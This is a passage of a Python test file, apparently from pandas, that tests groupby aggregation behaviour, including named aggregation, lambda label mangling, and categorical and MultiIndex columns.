expected_values, columns=expected_columns, index=expected_index
)
tm.assert_frame_equal(result, expected)
def test_agg_multiple_functions_same_name_with_ohlc_present():
# GH 30880
# ohlc expands dimensions, so different test to the above is required.
df = pd.DataFrame(
np.random.randn(1000, 3),
index=pd.date_range("1/1/2012", freq="S", periods=1000),
columns=["A", "B", "C"],
)
result = df.resample("3T").agg(
{"A": ["ohlc", partial(np.quantile, q=0.9999), partial(np.quantile, q=0.1111)]}
)
expected_index = pd.date_range("1/1/2012", freq="3T", periods=6)
expected_columns = pd.MultiIndex.from_tuples(
[
("A", "ohlc", "open"),
("A", "ohlc", "high"),
("A", "ohlc", "low"),
("A", "ohlc", "close"),
("A", "quantile", "A"),
("A", "quantile", "A"),
]
)
non_ohlc_expected_values = np.array(
[df.resample("3T").A.quantile(q=q).values for q in [0.9999, 0.1111]]
).T
expected_values = np.hstack([df.resample("3T").A.ohlc(), non_ohlc_expected_values])
expected = pd.DataFrame(
expected_values, columns=expected_columns, index=expected_index
)
# PerformanceWarning is thrown by `assert col in right` in assert_frame_equal
with tm.assert_produces_warning(PerformanceWarning):
tm.assert_frame_equal(result, expected)
def test_multiple_functions_tuples_and_non_tuples(df):
# #1359
funcs = [("foo", "mean"), "std"]
ex_funcs = [("foo", "mean"), ("std", "std")]
result = df.groupby("A")["C"].agg(funcs)
expected = df.groupby("A")["C"].agg(ex_funcs)
tm.assert_frame_equal(result, expected)
result = df.groupby("A").agg(funcs)
expected = df.groupby("A").agg(ex_funcs)
tm.assert_frame_equal(result, expected)
def test_more_flexible_frame_multi_function(df):
grouped = df.groupby("A")
exmean = grouped.agg({"C": np.mean, "D": np.mean})
exstd = grouped.agg({"C": np.std, "D": np.std})
expected = concat([exmean, exstd], keys=["mean", "std"], axis=1)
expected = expected.swaplevel(0, 1, axis=1).sort_index(level=0, axis=1)
d = {"C": [np.mean, np.std], "D": [np.mean, np.std]}
result = grouped.aggregate(d)
tm.assert_frame_equal(result, expected)
# be careful
result = grouped.aggregate({"C": np.mean, "D": [np.mean, np.std]})
expected = grouped.aggregate({"C": np.mean, "D": [np.mean, np.std]})
tm.assert_frame_equal(result, expected)
def foo(x):
return np.mean(x)
def bar(x):
return np.std(x, ddof=1)
# this uses column selection & renaming
msg = r"nested renamer is not supported"
with pytest.raises(SpecificationError, match=msg):
d = dict([["C", np.mean], ["D", dict([["foo", np.mean], ["bar", np.std]])]])
grouped.aggregate(d)
# But without renaming, these functions are OK
d = {"C": [np.mean], "D": [foo, bar]}
grouped.aggregate(d)
def test_multi_function_flexible_mix(df):
# GH #1268
grouped = df.groupby("A")
# Expected
d = {"C": {"foo": "mean", "bar": "std"}, "D": {"sum": "sum"}}
# this uses column selection & renaming
msg = r"nested renamer is not supported"
with pytest.raises(SpecificationError, match=msg):
grouped.aggregate(d)
# Test 1
d = {"C": {"foo": "mean", "bar": "std"}, "D": "sum"}
# this uses column selection & renaming
with pytest.raises(SpecificationError, match=msg):
grouped.aggregate(d)
# Test 2
d = {"C": {"foo": "mean", "bar": "std"}, "D": "sum"}
# this uses column selection & renaming
with pytest.raises(SpecificationError, match=msg):
grouped.aggregate(d)
def test_groupby_agg_coercing_bools():
# issue 14873
dat = pd.DataFrame({"a": [1, 1, 2, 2], "b": [0, 1, 2, 3], "c": [None, None, 1, 1]})
gp = dat.groupby("a")
index = Index([1, 2], name="a")
result = gp["b"].aggregate(lambda x: (x != 0).all())
expected = Series([False, True], index=index, name="b")
tm.assert_series_equal(result, expected)
result = gp["c"].aggregate(lambda x: x.isnull().all())
expected = Series([True, False], index=index, name="c")
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize(
"op",
[
lambda x: x.sum(),
lambda x: x.cumsum(),
lambda x: x.transform("sum"),
lambda x: x.transform("cumsum"),
lambda x: x.agg("sum"),
lambda x: x.agg("cumsum"),
],
)
def test_bool_agg_dtype(op):
# GH 7001
# Bool sum aggregations result in int
df = pd.DataFrame({"a": [1, 1], "b": [False, True]})
s = df.set_index("a")["b"]
result = op(df.groupby("a"))["b"].dtype
assert is_integer_dtype(result)
result = op(s.groupby("a")).dtype
assert is_integer_dtype(result)
def test_order_aggregate_multiple_funcs():
# GH 25692
df = pd.DataFrame({"A": [1, 1, 2, 2], "B": [1, 2, 3, 4]})
res = df.groupby("A").agg(["sum", "max", "mean", "ohlc", "min"])
result = res.columns.levels[1]
expected = pd.Index(["sum", "max", "mean", "ohlc", "min"])
tm.assert_index_equal(result, expected)
@pytest.mark.parametrize("dtype", [np.int64, np.uint64])
@pytest.mark.parametrize("how", ["first", "last", "min", "max", "mean", "median"])
def test_uint64_type_handling(dtype, how):
# GH 26310
df = pd.DataFrame({"x": 6903052872240755750, "y": [1, 2]})
expected = df.groupby("y").agg({"x": how})
df.x = df.x.astype(dtype)
result = df.groupby("y").agg({"x": how})
result.x = result.x.astype(np.int64)
tm.assert_frame_equal(result, expected, check_exact=True)
def test_func_duplicates_raises():
# GH28426
msg = "Function names"
df = pd.DataFrame({"A": [0, 0, 1, 1], "B": [1, 2, 3, 4]})
with pytest.raises(SpecificationError, match=msg):
df.groupby("A").agg(["min", "min"])
@pytest.mark.parametrize(
"index",
[
pd.CategoricalIndex(list("abc")),
pd.interval_range(0, 3),
pd.period_range("2020", periods=3, freq="D"),
pd.MultiIndex.from_tuples([("a", 0), ("a", 1), ("b", 0)]),
],
)
def test_agg_index_has_complex_internals(index):
# GH 31223
df = DataFrame({"group": [1, 1, 2], "value": [0, 1, 0]}, index=index)
result = df.groupby("group").agg({"value": Series.nunique})
expected = DataFrame({"group": [1, 2], "value": [2, 1]}).set_index("group")
tm.assert_frame_equal(result, expected)
def test_agg_split_block():
# https://github.com/pandas-dev/pandas/issues/31522
df = pd.DataFrame(
{
"key1": ["a", "a", "b", "b", "a"],
"key2": ["one", "two", "one", "two", "one"],
"key3": ["three", "three", "three", "six", "six"],
}
)
result = df.groupby("key1").min()
expected = pd.DataFrame(
{"key2": ["one", "one"], "key3": ["six", "six"]},
index=pd.Index(["a", "b"], name="key1"),
)
tm.assert_frame_equal(result, expected)
def test_agg_split_object_part_datetime():
# https://github.com/pandas-dev/pandas/pull/31616
df = pd.DataFrame(
{
"A": pd.date_range("2000", periods=4),
"B": ["a", "b", "c", "d"],
"C": [1, 2, 3, 4],
"D": ["b", "c", "d", "e"],
"E": pd.date_range("2000", periods=4),
"F": [1, 2, 3, 4],
}
).astype(object)
result = df.groupby([0, 0, 0, 0]).min()
expected = pd.DataFrame(
{
"A": [pd.Timestamp("2000")],
"B": ["a"],
"C": [1],
"D": ["b"],
"E": [pd.Timestamp("2000")],
"F": [1],
}
)
tm.assert_frame_equal(result, expected)
class TestNamedAggregationSeries:
def test_series_named_agg(self):
df = pd.Series([1, 2, 3, 4])
gr = df.groupby([0, 0, 1, 1])
result = gr.agg(a="sum", b="min")
expected = pd.DataFrame(
{"a": [3, 7], "b": [1, 3]}, columns=["a", "b"], index=[0, 1]
)
tm.assert_frame_equal(result, expected)
result = gr.agg(b="min", a="sum")
expected = expected[["b", "a"]]
tm.assert_frame_equal(result, expected)
def test_no_args_raises(self):
gr = pd.Series([1, 2]).groupby([0, 1])
with pytest.raises(TypeError, match="Must provide"):
gr.agg()
# but we do allow this
result = gr.agg([])
expected = pd.DataFrame()
tm.assert_frame_equal(result, expected)
def test_series_named_agg_duplicates_no_raises(self):
# GH28426
gr = pd.Series([1, 2, 3]).groupby([0, 0, 1])
grouped = gr.agg(a="sum", b="sum")
expected = pd.DataFrame({"a": [3, 3], "b": [3, 3]})
tm.assert_frame_equal(expected, grouped)
def test_mangled(self):
gr = pd.Series([1, 2, 3]).groupby([0, 0, 1])
result = gr.agg(a=lambda x: 0, b=lambda x: 1)
expected = pd.DataFrame({"a": [0, 0], "b": [1, 1]})
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"inp",
[
pd.NamedAgg(column="anything", aggfunc="min"),
("anything", "min"),
["anything", "min"],
],
)
def test_named_agg_nametuple(self, inp):
# GH34422
s = pd.Series([1, 1, 2, 2, 3, 3, 4, 5])
msg = f"func is expected but received {type(inp).__name__}"
with pytest.raises(TypeError, match=msg):
s.groupby(s.values).agg(a=inp)
class TestNamedAggregationDataFrame:
def test_agg_relabel(self):
df = pd.DataFrame(
{"group": ["a", "a", "b", "b"], "A": [0, 1, 2, 3], "B": [5, 6, 7, 8]}
)
result = df.groupby("group").agg(a_max=("A", "max"), b_max=("B", "max"))
expected = pd.DataFrame(
{"a_max": [1, 3], "b_max": [6, 8]},
index=pd.Index(["a", "b"], name="group"),
columns=["a_max", "b_max"],
)
tm.assert_frame_equal(result, expected)
# order invariance
p98 = functools.partial(np.percentile, q=98)
result = df.groupby("group").agg(
b_min=("B", "min"),
a_min=("A", min),
a_mean=("A", np.mean),
a_max=("A", "max"),
b_max=("B", "max"),
a_98=("A", p98),
)
expected = pd.DataFrame(
{
"b_min": [5, 7],
"a_min": [0, 2],
"a_mean": [0.5, 2.5],
"a_max": [1, 3],
"b_max": [6, 8],
"a_98": [0.98, 2.98],
},
index=pd.Index(["a", "b"], name="group"),
columns=["b_min", "a_min", "a_mean", "a_max", "b_max", "a_98"],
)
tm.assert_frame_equal(result, expected)
def test_agg_relabel_non_identifier(self):
df = pd.DataFrame(
{"group": ["a", "a", "b", "b"], "A": [0, 1, 2, 3], "B": [5, 6, 7, 8]}
)
result = df.groupby("group").agg(**{"my col": ("A", "max")})
expected = pd.DataFrame(
{"my col": [1, 3]}, index=pd.Index(["a", "b"], name="group")
)
tm.assert_frame_equal(result, expected)
def test_duplicate_no_raises(self):
# GH 28426, if use same input function on same column,
# no error should raise
df = pd.DataFrame({"A": [0, 0, 1, 1], "B": [1, 2, 3, 4]})
grouped = df.groupby("A").agg(a=("B", "min"), b=("B", "min"))
expected = pd.DataFrame(
{"a": [1, 3], "b": [1, 3]}, index=pd.Index([0, 1], name="A")
)
tm.assert_frame_equal(grouped, expected)
quant50 = functools.partial(np.percentile, q=50)
quant70 = functools.partial(np.percentile, q=70)
quant50.__name__ = "quant50"
quant70.__name__ = "quant70"
test = pd.DataFrame(
{"col1": ["a", "a", "b", "b", "b"], "col2": [1, 2, 3, 4, 5]}
)
grouped = test.groupby("col1").agg(
quantile_50=("col2", quant50), quantile_70=("col2", quant70)
)
expected = pd.DataFrame(
{"quantile_50": [1.5, 4.0], "quantile_70": [1.7, 4.4]},
index=pd.Index(["a", "b"], name="col1"),
)
tm.assert_frame_equal(grouped, expected)
def test_agg_relabel_with_level(self):
df = pd.DataFrame(
{"A": [0, 0, 1, 1], "B": [1, 2, 3, 4]},
index=pd.MultiIndex.from_product([["A", "B"], ["a", "b"]]),
)
result = df.groupby(level=0).agg(
aa=("A", "max"), bb=("A", "min"), cc=("B", "mean")
)
expected = pd.DataFrame(
{"aa": [0, 1], "bb": [0, 1], "cc": [1.5, 3.5]}, index=["A", "B"]
)
tm.assert_frame_equal(result, expected)
def test_agg_relabel_other_raises(self):
df = pd.DataFrame({"A": [0, 0, 1], "B": [1, 2, 3]})
grouped = df.groupby("A")
match = "Must provide"
with pytest.raises(TypeError, match=match):
grouped.agg(foo=1)
with pytest.raises(TypeError, match=match):
grouped.agg()
with pytest.raises(TypeError, match=match):
grouped.agg(a=("B", "max"), b=(1, 2, 3))
def test_missing_raises(self):
df = pd.DataFrame({"A": [0, 1], "B": [1, 2]})
with pytest.raises(KeyError, match="Column 'C' does not exist"):
df.groupby("A").agg(c=("C", "sum"))
def test_agg_namedtuple(self):
df = pd.DataFrame({"A": [0, 1], "B": [1, 2]})
result = df.groupby("A").agg(
b=pd.NamedAgg("B", "sum"), c=pd.NamedAgg(column="B", aggfunc="count")
)
expected = df.groupby("A").agg(b=("B", "sum"), c=("B", "count"))
tm.assert_frame_equal(result, expected)
def test_mangled(self):
df = pd.DataFrame({"A": [0, 1], "B": [1, 2], "C": [3, 4]})
result = df.groupby("A").agg(b=("B", lambda x: 0), c=("C", lambda x: 1))
expected = pd.DataFrame(
{"b": [0, 0], "c": [1, 1]}, index=pd.Index([0, 1], name="A")
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"agg_col1, agg_col2, agg_col3, agg_result1, agg_result2, agg_result3",
[
(
(("y", "A"), "max"),
(("y", "A"), np.min),
(("y", "B"), "mean"),
[1, 3],
[0, 2],
[5.5, 7.5],
),
(
(("y", "A"), lambda x: max(x)),
(("y", "A"), lambda x: 1),
(("y", "B"), "mean"),
[1, 3],
[1, 1],
[5.5, 7.5],
),
(
pd.NamedAgg(("y", "A"), "max"),
pd.NamedAgg(("y", "B"), np.mean),
pd.NamedAgg(("y", "A"), lambda x: 1),
[1, 3],
[5.5, 7.5],
[1, 1],
),
],
)
def test_agg_relabel_multiindex_column(
agg_col1, agg_col2, agg_col3, agg_result1, agg_result2, agg_result3
):
# GH 29422, add tests for multiindex column cases
df = DataFrame(
{"group": ["a", "a", "b", "b"], "A": [0, 1, 2, 3], "B": [5, 6, 7, 8]}
)
df.columns = pd.MultiIndex.from_tuples([("x", "group"), ("y", "A"), ("y", "B")])
idx = pd.Index(["a", "b"], name=("x", "group"))
result = df.groupby(("x", "group")).agg(a_max=(("y", "A"), "max"))
expected = DataFrame({"a_max": [1, 3]}, index=idx)
tm.assert_frame_equal(result, expected)
result = df.groupby(("x", "group")).agg(
col_1=agg_col1, col_2=agg_col2, col_3=agg_col3
)
expected = DataFrame(
{"col_1": agg_result1, "col_2": agg_result2, "col_3": agg_result3}, index=idx
)
tm.assert_frame_equal(result, expected)
def test_agg_relabel_multiindex_raises_not_exist():
# GH 29422, add test for raises senario when aggregate column does not exist
df = DataFrame(
{"group": ["a", "a", "b", "b"], "A": [0, 1, 2, 3], "B": [5, 6, 7, 8]}
)
df.columns = pd.MultiIndex.from_tuples([("x", "group"), ("y", "A"), ("y", "B")])
with pytest.raises(KeyError, match="does not exist"):
df.groupby(("x", "group")).agg(a=(("Y", "a"), "max"))
def test_agg_relabel_multiindex_duplicates():
    # GH 29422 / GH 28426: relabelling the same MultiIndex source column
    # twice under different output names must work and duplicate the result.
    data = {"group": ["a", "a", "b", "b"], "A": [0, 1, 2, 3], "B": [5, 6, 7, 8]}
    frame = DataFrame(data)
    frame.columns = pd.MultiIndex.from_tuples(
        [("x", "group"), ("y", "A"), ("y", "B")]
    )
    result = frame.groupby(("x", "group")).agg(
        a=(("y", "A"), "min"), b=(("y", "A"), "min")
    )
    expected_index = pd.Index(["a", "b"], name=("x", "group"))
    expected = DataFrame({"a": [0, 2], "b": [0, 2]}, index=expected_index)
    tm.assert_frame_equal(result, expected)
# GH 32580: an empty list of aggregation functions for a column must be
# tolerated (the column is simply dropped from the result).
@pytest.mark.parametrize("kwargs", [{"c": ["min"]}, {"b": [], "c": ["min"]}])
def test_groupby_aggregate_empty_key(kwargs):
    # GH: 32580
    df = pd.DataFrame({"a": [1, 1, 2], "b": [1, 2, 3], "c": [1, 2, 4]})
    result = df.groupby("a").agg(kwargs)
    expected = pd.DataFrame(
        [1, 4],
        index=pd.Index([1, 2], dtype="int64", name="a"),
        columns=pd.MultiIndex.from_tuples([["c", "min"]]),
    )
    tm.assert_frame_equal(result, expected)
def test_groupby_aggregate_empty_key_empty_return():
    # GH 32580: aggregating with only an empty function list returns an
    # empty frame whose columns form an empty MultiIndex level product.
    frame = pd.DataFrame({"a": [1, 1, 2], "b": [1, 2, 3], "c": [1, 2, 4]})
    result = frame.groupby("a").agg({"b": []})
    empty_columns = pd.MultiIndex(levels=[["b"], []], codes=[[], []])
    expected = pd.DataFrame(columns=empty_columns)
    tm.assert_frame_equal(result, expected)
def test_grouby_agg_loses_results_with_as_index_false_relabel():
    # GH 32240: with as_index=False, relabelled aggregation results used
    # to be dropped; the named output column must survive.
    frame = pd.DataFrame(
        {"key": ["x", "y", "z", "x", "y", "z"], "val": [1.0, 0.8, 2.0, 3.0, 3.6, 0.75]}
    )
    grouped = frame.groupby("key", as_index=False)
    result = grouped.agg(min_val=pd.NamedAgg(column="val", aggfunc="min"))
    expected = pd.DataFrame({"key": ["x", "y", "z"], "min_val": [1.0, 0.8, 0.75]})
    tm.assert_frame_equal(result, expected)
def test_grouby_agg_loses_results_with_as_index_false_relabel_multiindex():
    # GH 32240: with as_index=False and several grouping keys, relabelled
    # aggregation must keep every key column, in group order.
    frame = pd.DataFrame(
        {
            "key": ["x", "y", "x", "y", "x", "x"],
            "key1": ["a", "b", "c", "b", "a", "c"],
            "val": [1.0, 0.8, 2.0, 3.0, 3.6, 0.75],
        }
    )
    grouped = frame.groupby(["key", "key1"], as_index=False)
    result = grouped.agg(min_val=pd.NamedAgg(column="val", aggfunc="min"))
    expected = pd.DataFrame(
        {"key": ["x", "x", "y"], "key1": ["a", "c", "b"], "min_val": [1.0, 0.75, 0.8]}
    )
    tm.assert_frame_equal(result, expected)
# GH 31777: user-defined reducers must work on frames with MultiIndex columns.
@pytest.mark.parametrize(
    "func", [lambda s: s.mean(), lambda s: np.mean(s), lambda s: np.nanmean(s)]
)
def test_multiindex_custom_func(func):
    # GH 31777
    data = [[1, 4, 2], [5, 7, 1]]
    df = pd.DataFrame(data, columns=pd.MultiIndex.from_arrays([[1, 1, 2], [3, 4, 3]]))
    # One row per group, so the mean equals the single value.
    result = df.groupby(np.array([0, 1])).agg(func)
    expected_dict = {(1, 3): {0: 1, 1: 5}, (1, 4): {0: 4, 1: 7}, (2, 3): {0: 2, 1: 1}}
    expected = pd.DataFrame(expected_dict)
    tm.assert_frame_equal(result, expected)
def myfunc(s):
    """Return the 0.9th percentile of *s*.

    NOTE: ``np.percentile``'s ``q`` is on the 0-100 scale, so ``q=0.90``
    is the 0.9th percentile, not the 90th.
    """
    quantile = 0.90
    return np.percentile(s, q=quantile)
# gh-28467: lambdas and named helper functions must both be accepted as the
# aggfunc part of a named-aggregation spec.
@pytest.mark.parametrize("func", [lambda s: np.percentile(s, q=0.90), myfunc])
def test_lambda_named_agg(func):
    # see gh-28467
    animals = DataFrame(
        {
            "kind": ["cat", "dog", "cat", "dog"],
            "height": [9.1, 6.0, 9.5, 34.0],
            "weight": [7.9, 7.5, 9.9, 198.0],
        }
    )
    result = animals.groupby("kind").agg(
        mean_height=("height", "mean"), perc90=("height", func)
    )
    # NOTE(review): q=0.90 is on np.percentile's 0-100 scale, hence the
    # perc90 values sit just above each group's minimum height.
    expected = DataFrame(
        [[9.3, 9.1036], [20.0, 6.252]],
        columns=["mean_height", "perc90"],
        index=Index(["cat", "dog"], name="kind"),
    )
    tm.assert_frame_equal(result, expected)
def test_aggregate_mixed_types():
    # GH 16916: a grouping column holding mixed str/int labels must still
    # aggregate; integer keys sort before string keys in the result.
    frame = pd.DataFrame(
        data=np.array([0] * 9).reshape(3, 3), columns=list("XYZ"), index=list("abc")
    )
    frame["grouping"] = ["group 1", "group 1", 2]
    result = frame.groupby("grouping").aggregate(lambda x: x.tolist())
    rows = [[[0], [0], [0]], [[0, 0], [0, 0], [0, 0]]]
    expected = pd.DataFrame(
        rows,
        index=Index([2, "group 1"], dtype="object", name="grouping"),
        columns=Index(["X", "Y", "Z"], dtype="object"),
    )
    tm.assert_frame_equal(result, expected)
# Expected to fail until GH 31256 lands: UDF results containing pd.NA are
# not cast back to the Int64 extension dtype.
@pytest.mark.xfail(reason="Not implemented;see GH 31256")
def test_aggregate_udf_na_extension_type():
    # https://github.com/pandas-dev/pandas/pull/31359
    # This is currently failing to cast back to Int64Dtype.
    # The presence of the NA causes two problems
    # 1. NA is not an instance of Int64Dtype.type (numpy.int64)
    # 2. The presence of an NA forces object type, so the non-NA values is
    #    a Python int rather than a NumPy int64. Python ints aren't
    #    instances of numpy.int64.
    def aggfunc(x):
        # Reduces each group to 1 or pd.NA depending on its values.
        if all(x > 2):
            return 1
        else:
            return pd.NA
    df = pd.DataFrame({"A": pd.array([1, 2, 3])})
    result = df.groupby([1, 1, 2]).agg(aggfunc)
    expected = pd.DataFrame({"A": pd.array([1, pd.NA], dtype="Int64")}, index=[1, 2])
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("func", ["min", "max"])
def test_groupby_aggregate_period_column(func):
    """min/max on a PeriodDtype SeriesGroupBy keeps the Period dtype (GH 31471)."""
    groups = [1, 2]
    periods = pd.period_range("2020", periods=2, freq="Y")
    df = pd.DataFrame({"a": groups, "b": periods})
    result = getattr(df.groupby("a")["b"], func)()
    # pd.Int64Index was deprecated in pandas 1.4 and removed in 2.0; a plain
    # Index with an explicit dtype is the forward-compatible spelling and
    # compares equal to the old Int64Index.
    idx = pd.Index([1, 2], dtype="int64", name="a")
    # One row per group, so min and max both return the group's sole period.
    expected = pd.Series(periods, index=idx, name="b")
    tm.assert_series_equal(result, expected)
@pytest.mark.parametrize("func", ["min", "max"])
def test_groupby_aggregate_period_frame(func):
    """min/max on a DataFrameGroupBy keeps PeriodDtype columns (GH 31471)."""
    groups = [1, 2]
    periods = pd.period_range("2020", periods=2, freq="Y")
    df = pd.DataFrame({"a": groups, "b": periods})
    result = getattr(df.groupby("a"), func)()
    # pd.Int64Index was deprecated in pandas 1.4 and removed in 2.0; a plain
    # Index with an explicit dtype is the forward-compatible spelling and
    # compares equal to the old Int64Index.
    idx = pd.Index([1, 2], dtype="int64", name="a")
    # One row per group, so min and max both return the group's sole period.
    expected = pd.DataFrame({"b": periods}, index=idx)
    tm.assert_frame_equal(result, expected)
class TestLambdaMangling:
    """Tests for mangling of duplicate lambda labels in aggregation.

    Several lambdas applied to one column cannot all be labelled
    "<lambda>", so groupby relabels them "<lambda_0>", "<lambda_1>", ...
    """
    def test_basic(self):
        # Duplicate lambdas on one column receive suffixed labels.
        df = pd.DataFrame({"A": [0, 0, 1, 1], "B": [1, 2, 3, 4]})
        result = df.groupby("A").agg({"B": [lambda x: 0, lambda x: 1]})
        expected = pd.DataFrame(
            {("B", "<lambda_0>"): [0, 0], ("B", "<lambda_1>"): [1, 1]},
            index=pd.Index([0, 1], name="A"),
        )
        tm.assert_frame_equal(result, expected)
    def test_mangle_series_groupby(self):
        # The same mangling applies to SeriesGroupBy.agg with a lambda list.
        gr = pd.Series([1, 2, 3, 4]).groupby([0, 0, 1, 1])
        result = gr.agg([lambda x: 0, lambda x: 1])
        expected = pd.DataFrame({"<lambda_0>": [0, 0], "<lambda_1>": [1, 1]})
        tm.assert_frame_equal(result, expected)
    @pytest.mark.xfail(reason="GH-26611. kwargs for multi-agg.")
    def test_with_kwargs(self):
        # Positional/keyword extras are not yet forwarded when aggregating
        # with a list of functions (GH 26611).
        f1 = lambda x, y, b=1: x.sum() + y + b
        f2 = lambda x, y, b=2: x.sum() + y * b
        result = pd.Series([1, 2]).groupby([0, 0]).agg([f1, f2], 0)
        expected = pd.DataFrame({"<lambda_0>": [4], "<lambda_1>": [6]})
        tm.assert_frame_equal(result, expected)
        result = pd.Series([1, 2]).groupby([0, 0]).agg([f1, f2], 0, b=10)
        expected = pd.DataFrame({"<lambda_0>": [13], "<lambda_1>": [30]})
        tm.assert_frame_equal(result, expected)
    def test_agg_with_one_lambda(self):
        # GH 25719, write tests for DataFrameGroupby.agg with only one lambda
        df = pd.DataFrame(
            {
                "kind": ["cat", "dog", "cat", "dog"],
                "height": [9.1, 6.0, 9.5, 34.0],
                "weight": [7.9, 7.5, 9.9, 198.0],
            }
        )
        columns = ["height_sqr_min", "height_max", "weight_max"]
        expected = pd.DataFrame(
            {
                "height_sqr_min": [82.81, 36.00],
                "height_max": [9.5, 34.0],
                "weight_max": [9.9, 198.0],
            },
            index=pd.Index(["cat", "dog"], name="kind"),
            columns=columns,
        )
        # check pd.NameAgg case
        result1 = df.groupby(by="kind").agg(
            height_sqr_min=pd.NamedAgg(
                column="height", aggfunc=lambda x: np.min(x ** 2)
            ),
            height_max=pd.NamedAgg(column="height", aggfunc="max"),
            weight_max=pd.NamedAgg(column="weight", aggfunc="max"),
        )
        tm.assert_frame_equal(result1, expected)
        # check agg(key=(col, aggfunc)) case
        result2 = df.groupby(by="kind").agg(
            height_sqr_min=("height", lambda x: np.min(x ** 2)),
            height_max=("height", "max"),
            weight_max=("weight", "max"),
        )
        tm.assert_frame_equal(result2, expected)
    def test_agg_multiple_lambda(self):
        # GH25719, test for DataFrameGroupby.agg with multiple lambdas
        # with mixed aggfunc
        df = pd.DataFrame(
            {
                "kind": ["cat", "dog", "cat", "dog"],
                "height": [9.1, 6.0, 9.5, 34.0],
                "weight": [7.9, 7.5, 9.9, 198.0],
            }
        )
        columns = [
            "height_sqr_min",
            "height_max",
            "weight_max",
            "height_max_2",
            "weight_min",
        ]
        expected = pd.DataFrame(
            {
                "height_sqr_min": [82.81, 36.00],
                "height_max": [9.5, 34.0],
                "weight_max": [9.9, 198.0],
                "height_max_2": [9.5, 34.0],
                "weight_min": [7.9, 7.5],
            },
            index=pd.Index(["cat", "dog"], name="kind"),
            columns=columns,
        )
        # check agg(key=(col, aggfunc)) case
        result1 = df.groupby(by="kind").agg(
            height_sqr_min=("height", lambda x: np.min(x ** 2)),
            height_max=("height", "max"),
            weight_max=("weight", "max"),
            height_max_2=("height", lambda x: np.max(x)),
            weight_min=("weight", lambda x: np.min(x)),
        )
        tm.assert_frame_equal(result1, expected)
        # check pd.NamedAgg case
        result2 = df.groupby(by="kind").agg(
            height_sqr_min=pd.NamedAgg(
                column="height", aggfunc=lambda x: np.min(x ** 2)
            ),
            height_max=pd.NamedAgg(column="height", aggfunc="max"),
            weight_max=pd.NamedAgg(column="weight", aggfunc="max"),
            height_max_2=pd.NamedAgg(column="height", aggfunc=lambda x: np.max(x)),
            weight_min=pd.NamedAgg(column="weight", aggfunc=lambda x: np.min(x)),
        )
        tm.assert_frame_equal(result2, expected)
def test_groupby_get_by_index():
    # GH 33439: a lambda that looks up the last index label via Series.get
    # must return the final value of each group.
    frame = pd.DataFrame({"A": ["S", "W", "W"], "B": [1.0, 1.0, 2.0]})
    result = frame.groupby("A").agg({"B": lambda x: x.get(x.index[-1])})
    expected = pd.DataFrame(dict(A=["S", "W"], B=[1.0, 2.0])).set_index("A")
    pd.testing.assert_frame_equal(result, expected)
# GH 27800: single (non-list) aggregations on ordered categorical columns.
@pytest.mark.parametrize(
    "grp_col_dict, exp_data",
    [
        ({"nr": "min", "cat_ord": "min"}, {"nr": [1, 5], "cat_ord": ["a", "c"]}),
        ({"cat_ord": "min"}, {"cat_ord": ["a", "c"]}),
        ({"nr": "min"}, {"nr": [1, 5]}),
    ],
)
def test_groupby_single_agg_cat_cols(grp_col_dict, exp_data):
    # test single aggregations on ordered categorical cols GH 27800
    # create the result dataframe
    input_df = pd.DataFrame(
        {
            "nr": [1, 2, 3, 4, 5, 6, 7, 8],
            "cat_ord": list("aabbccdd"),
            "cat": list("aaaabbbb"),
        }
    )
    input_df = input_df.astype({"cat": "category", "cat_ord": "category"})
    input_df["cat_ord"] = input_df["cat_ord"].cat.as_ordered()
    result_df = input_df.groupby("cat").agg(grp_col_dict)
    # create expected dataframe
    cat_index = pd.CategoricalIndex(
        ["a", "b"], categories=["a", "b"], ordered=False, name="cat", dtype="category"
    )
    expected_df = pd.DataFrame(data=exp_data, index=cat_index)
    tm.assert_frame_equal(result_df, expected_df)
# GH 27800: list-valued (combined) aggregations on ordered categorical columns.
@pytest.mark.parametrize(
    "grp_col_dict, exp_data",
    [
        ({"nr": ["min", "max"], "cat_ord": "min"}, [(1, 4, "a"), (5, 8, "c")]),
        ({"nr": "min", "cat_ord": ["min", "max"]}, [(1, "a", "b"), (5, "c", "d")]),
        ({"cat_ord": ["min", "max"]}, [("a", "b"), ("c", "d")]),
    ],
)
def test_groupby_combined_aggs_cat_cols(grp_col_dict, exp_data):
    # test combined aggregations on ordered categorical cols GH27800
    # create the result dataframe
    input_df = pd.DataFrame(
        {
            "nr": [1, 2, 3, 4, 5, 6, 7, 8],
            "cat_ord": list("aabbccdd"),
            "cat": list("aaaabbbb"),
        }
    )
    input_df = input_df.astype({"cat": "category", "cat_ord": "category"})
    input_df["cat_ord"] = input_df["cat_ord"].cat.as_ordered()
    result_df = input_df.groupby("cat").agg(grp_col_dict)
    # create expected dataframe
    cat_index = pd.CategoricalIndex(
        ["a", "b"], categories=["a", "b"], ordered=False, name="cat", dtype="category"
    )
    # unpack the grp_col_dict to create the multi-index tuple
    # this tuple will be used to create the expected dataframe index
    multi_index_list = []
    for k, v in grp_col_dict.items():
        if isinstance(v, list):
            for value in v:
                multi_index_list.append([k, value])
        else:
            multi_index_list.append([k, v])
    multi_index = pd.MultiIndex.from_tuples(tuple(multi_index_list))
    expected_df = pd.DataFrame(data=exp_data, columns=multi_index, index=cat_index)
    tm.assert_frame_equal(result_df, expected_df)
def test_nonagg_agg():
    # GH 35490: applying a non-aggregating function directly or wrapped in a
    # list must give the same values.
    # TODO: agg should raise for functions that don't aggregate
    frame = pd.DataFrame({"a": [1, 1, 2, 2], "b": [1, 2, 2, 1]})
    grouped = frame.groupby("a")
    listed = grouped.agg(["cumsum"])
    # Drop the function-name level so both results share flat columns.
    listed.columns = listed.columns.droplevel(-1)
    expected = grouped.agg("cumsum")
    tm.assert_frame_equal(listed, expected)
def test_agg_no_suffix_index():
    # GH 36189: duplicate lambdas passed to DataFrame.agg keep the plain
    # "<lambda>" label instead of suffixed names.
    frame = pd.DataFrame([[4, 9]] * 3, columns=["A", "B"])
    result = frame.agg(["sum", lambda x: x.sum(), lambda x: x.sum()])
    expected = pd.DataFrame(
        {"A": [12, 12, 12], "B": [27, 27, 27]}, index=["sum", "<lambda>", "<lambda>"]
    )
    tm.assert_frame_equal(result, expected)
    # Same behaviour for the Series case.
    series_result = frame["A"].agg(["sum", lambda x: x.sum(), lambda x: x.sum()])
    series_expected = pd.Series(
        [12, 12, 12], index=["sum", "<lambda>", "<lambda>"], name="A"
    )
